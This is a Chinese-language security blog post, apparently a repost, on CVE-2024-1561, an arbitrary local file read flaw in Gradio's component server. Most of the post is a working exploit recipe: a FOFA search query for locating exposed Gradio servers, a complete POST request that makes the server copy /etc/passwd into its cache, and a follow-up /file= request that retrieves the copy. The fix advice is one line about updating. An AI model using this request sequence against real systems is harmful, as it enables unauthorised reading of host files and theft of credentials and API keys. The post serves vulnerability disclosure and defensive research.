Gradio component server 任意文件读取(CVE-2024-1561)

admin 2024年5月19日15:05:35评论58 views字数 812阅读2分42秒阅读模式

0x00.产品介绍

Gradio是一个开源的Python库,用于创建机器学习模型的交互式界面。它使得展示和测试模型变得简单快捷,无需深入了解复杂的前端技术。广泛应用于数据科学、教育、研究和软件开发领域,尤其适合于快速原型设计、模型验证、演示和教学。

Gradio component server 任意文件读取(CVE-2024-1561)

0x01.漏洞介绍

该漏洞允许未经授权的本地文件读取访问,尤其是当应用程序通过`launch(share=True)`暴露到互联网时,从而允许远程攻击者读取主机机器上的文件。此外,托管在`huggingface.co`上的gradio应用也受到影响,可能导致敏感信息,如存储在环境变量中的API密钥和凭据的泄露。Gradio component server 任意文件读取(CVE-2024-1561)

0x02.漏洞复现

FOFA:body="__gradio_mode__"

访问config目录搜索components获取到id的值

Gradio component server 任意文件读取(CVE-2024-1561)

填入id的值发送如下请求

POST /component_server HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3Connection: closeContent-Type: application/jsonAccept-Encoding: gzip {"component_id": "id值","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "a"}

相应包获取返回的路径

Gradio component server 任意文件读取(CVE-2024-1561)

请求如下,将返回的路径填入file参数中请求即可

http://x.x.x.x/file=/tmp/gradio/xxxxxxxxx/passwd

Gradio component server 任意文件读取(CVE-2024-1561)

0x03.修复建议

厂商已提供漏洞修补方案,请关注厂商主页及时更新

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日15:05:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Gradio component server 任意文件读取(CVE-2024-1561)http://cn-sec.com/archives/2755944.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息